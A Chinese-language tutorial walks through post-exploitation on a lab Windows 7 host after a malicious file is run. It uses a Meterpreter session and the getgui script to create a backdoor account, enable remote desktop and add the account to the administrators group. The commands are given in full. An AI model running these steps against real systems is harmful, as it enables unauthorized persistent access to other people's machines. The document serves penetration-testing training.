网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战

一、背景介绍
在我们日常使用Kali Linux时,我们通常在进行模拟攻防演练的时候,我们如何拿下目标主机最高权限呢(例如利用病毒拿下Win7主机),怎样在受害者主机进行随意操作呢?如何进行文件下载以及文件上传呢?如何解决上述问题呢?接下来让我们一起学习!
二、资源装备
1.安装好Kali Linux的虚拟机一台;
2.已经被控制的Windows主机一个;
3.整装待发的小白一个。
三、战略安排
3.1查看kali虚拟机sessions状况,如下图所示。
命令:sessions
c
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第1张图片

3.2 在受害者主机执行病毒文件,如下图所示。
步骤:双击如下图所示的文件
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第2张图片

3.3 再次在Kali Linux中执行sessions命令,如下图所示。
命令:sessions
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第3张图片

3.4 执行命令,给受害者主机创建用户,如下图所示。
命令:sessions -i 5
run getgui -u 用户名 -p 密码
Eg: run getgui -u hacker -p 123456
在这里插入图片描述

3.5 执行getgui脚本文件,开启受害者主机3389端口(远程桌面连接端口),如下图所示。
命令:run getgui -e
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第4张图片

3.5.1 执行结果如下图所示。
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第5张图片

3.6 查看受害者主机的ip地址,如下图所示。
命令:ipconfig
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第6张图片

3.7 连接受害者主机的远程桌面,如下图所示。
命令:rdesktop 192.168.0.107:3389
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第7张图片

3.7.1 登录窗口如下图所示,根据创建的用户进行登录
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第8张图片

3.8 遇到创建的用户不是管理员组用户的问题,如下图所示
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第9张图片

3.9 解决升级管理员权限的问题
3.9.1 启动dos窗口
命令:shell
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第10张图片

3.9.2 升级管理员用户,如下图所示。
命令:localgroup administrators 用户名 /add
Eg :localgroup administrators hacker /add
在这里插入图片描述

3.9.3 解决乱码问题,如下图所示。
命令:chcp 65001
在这里插入图片描述

3.10 继续登录,如下图所示。
3.10.1 登录界面
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第11张图片

3.10.2 选择是
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第12张图片
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第13张图片

3.11 渗透成功,如下图所示。

网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第14张图片
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战_第15张图片

辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!
点我学习完整视频渗透课,预计更新1000节

你可能感兴趣的:(科技,黑客,IT技术,网络,计算机视觉,信息安全,安全,linux)